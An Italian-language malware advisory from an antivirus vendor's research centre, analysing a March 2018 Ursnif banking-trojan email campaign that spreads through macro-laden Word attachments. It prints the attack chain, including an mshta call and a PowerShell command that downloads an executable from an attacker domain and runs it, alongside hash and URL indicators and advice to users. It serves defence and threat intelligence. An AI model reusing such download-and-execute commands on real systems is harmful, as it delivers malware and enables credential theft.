Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft della campagna di mail che diffonde il malware Ursnif in data 13 e 14 marzo 2018
Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di " ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.
Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette |
INDICE
|
Campagna malware "Ursnif"
Famiglia malware:
Ursnif
VirIT: Trojan.Win32.Ursnif.EO, Trojan.DOC.Dropper.OP, Trojan.DOC.Dropper.OM, Trojan.Win32.Ursnif.EP
Descrizione:
La campagna di mail è partita il 13 marzo 2018 e sta continuando con una nuova ondata anche oggi 14 marzo.
|
Oggetto: [cambia in base alla mail che si riceve]
|
|
Vedi allegato e di confermare. |
Come si diffonde:
Sfrutta gli account di posta elettronica configurati nel pc infettato, inviando finte risposte infette, a dei messaggi che sono stati GIA RICEVUTI in precedenza dalla vittima stessa.
Il corpo del messaggio è sempre lo stesso (visibile qui sopra in rosso), invece l'oggetto è diverso proprio perchè rispondendo a dei messaggi che la vittima ha ricevuto, nei giorni precedenti, varia in base ad essi.
L'allegato malevole presente nella mail è un file DOC che al suo interno contiene una MACRO AutoClose che appena viene avviata scarica il malware e lo mette in esecuzione.
La macro Autoclose prima esegue il file MSHTA.EXE passandogli come parametro l'indirizzo url da cui scaricare uno script per PowerShell (campagna del 2018-03-13):
C:\Windows\System32\mshta.exe http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf
A questo punto viene scaricato uno script ed eseguito da PowerShell:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile('http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class', $env:APPDATA + '\\dcd83bd5.exe'); Start-Process $env:APPDATA'\\dcd83bd5.exe'; (New-Object System.Net.WebClient).DownloadString('http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidf');
Lo script di PoweShell fa il download dell'Ursnif dal sito
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class e lo mette in esecuzione automatica.
Dei file DOC analizzati i siti da dove viene scaricato il malware sono i seguenti:
- http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf
- http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class
- http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidf
Il malware dopo venir avviato crea una chiave in HKCU\Software\Microsoft\Windows\CurrentVersion\Run con [valore casuale] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[CARTELLA CASUALE]\NOMEFILE.EXE.
Il malware Ursnif fa un injection nel process EXPLORER.EXE
Esempi:
Nome: 53aeb123.exe
MD5: E79E933B5241CAA7763830C0CE4E241E
Dimensione: 357.376 byte
Data di compilazione: 31/05/2024 02.17.41
Come si può notare la data di compilazione è stata falsificata all'anno 2024!
Nome: d2203965.exe
MD5: 11EEC45893C23484DD31797690FE2203
Dimensione: 612.864 byte
Data di compilazione: 04/10/2004 15.59.46
Nella campagna del 14 marzo, la macro di Word esegue prima il cmd.exe e dopo powershell.exe per scaricare il Trojan Banker Ursnif dal sito http://waidjqwudhsfganweweha[.]com.
Note:
Il malware che viene scaricato fa parte della famiglia degli Ursnif, le sue peculiarità sono quelle di carpire password di accesso a siti importanti come possono essere home banking, posta, ftp etc.
IOC 2018-03-13:
File DOC MD5:
082067D08B4922CE359B08314572E17E
0A301BF3A183B07A29BF94E124569534
177425E33D7CB92E878B6CEEE7B69A4D
196124165249B60C4DBFC2BF541D53FC
1D4CFFA8503DCE2938367BE8586E0021
209F8193DCAA71C59625DFDDE52C38F3
2449CA769FBC20627012F1AAFF20DCDD
307E56E1B135E13EB0C3036978BCDAEB
3093611810F68DAE319095C4CBD83670
3BBA84853F5684BDFBB16D81E73A4D0F
3E287BF157D8355DBFEB7DCD81809CFC
43AA5981EDBF0604407A190AED3B17C7
4C10C21AE77940D1E5D6983268750F18
5917D6A7E7FBB19F6EC92D3488007095
62EF5FFDC1CFDD371E1A1BF4A63CB7C4
630F3AE1AC0054D0A8B9AB23AE75A904
6B30646D9B94A9449BAF9DDF3C325BEF
6C6274741355D7455D17D11E69501F14
765DA376D714E3BF7FDCE76CD03536A6
7945A4E9AACE1DF637C773F4B55AAD8B
7C4EFAA52802C59E73F87549117F8EF0
929AD25BCD81D3C33E84F61F1BB86FE0
A931B9E57A84D80405A0D417741476D7
AB41A1A8704D975ABA8CB8B72A98805A
BDA1E9E53FC818D8C1BCE320B71E77C5
BECF044A04E5DD1EFDFD2595B44D3304
C1BE41600B7E3FF0F16613866E52F8ED
C347A48A75F935E93AB9A7E445ECEB36
CC5FC59049C4BA39F7D84F3C68FDD52C
D09EA2FCD19D07BD07EFDEB1896E7E03
D394EF1BCE9ABF795E099145D89B22B2
DC9FCB24B7A929D95F9BB39FF00D41DE
EB9F29B3C6099A244D144F767178A129
FA9EB2B192E5A9FF0F7F999E9986FFBA
FEC143157AEBE91F6160E559B3859034
File EXE MD5:
11EEC45893C23484DD31797690FE2203
39F75FD74A440BEEFEA83B52F290AA3E
58BF0383AC83DFBCE1851FE02FFB4B55
92001083584DA4F9394371C9DB2570D6
E79E933B5241CAA7763830C0CE4E241E
URL:
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpid
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpida
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidb
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidc
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidd
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpide
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpid.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpida.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidb.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidc.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidd.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpide.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpid
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpida
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidb
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidc
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidd
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpide
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidf
IOC 2018-03-14 (upgrade ore 12:56):
File DOC MD5:
10B415DA3B0931502C96A517F96A618D
143E45E1C63349C1E2F8A109F30FEB9A
1DC3EAD8A99918008CE416BFB9FB87A6
2CD58B6EF36D218FB89151D28668998E
38A4237CE90D40B3BDB0E51457F82D2E
4462587452684966029886A14E3409C9
5B75CE27B8A5D489223FF3BF8F07616D
704970D3342CE1F89B00CD5279FC863B
99570DD0B28429FD76842FB55204CB23
A3B4536464CEA7DB732885B6BA011C17
BB4F9A8AB9DB369FB4819D7AA9F42F9B
D9EE1AB90C2FC022194AFB4B96831920
F3CFC46592170CF1D8AD466134FD53D5
File EXE MD5:
A3D71E2E2249067CFF6ECBBEC5E7C7A1
AA583374D7A08D90772A3DAD3280886D
B857CC9CD3A3E10724BCC659FCC020C1
F5533A3F2DFA99D16E99F56C8C182C71
FCF53476C655730BF3486983BE218455
URL:
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker1.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker2.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker3.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker4.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker5.class
Come cercare di riconoscere una falsa mail
L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'
attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato
ZIP e, se possibile, NON abilitare l'esecuzione automatica delle
macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file
Word ed
Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un
Banker, il consiglio da parte del
C.R.A.M. di
TG Soft è quello di prendere opportuni accorgimenti di sicurezza
anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio
istituto di credito.
Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing
L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:
- qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliento come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
- salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possiible/probabile phishing; possibile/probabile malware o altro).
Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.
Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite
Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.
Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari: |
 |
- liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
- interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
- identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
- grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
- Procedi al download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.
Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...
 |
Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI. |
C.R.A.M.
Centro Ricerche Anti-Malware di
TG Soft
Torna ad inizio pagina
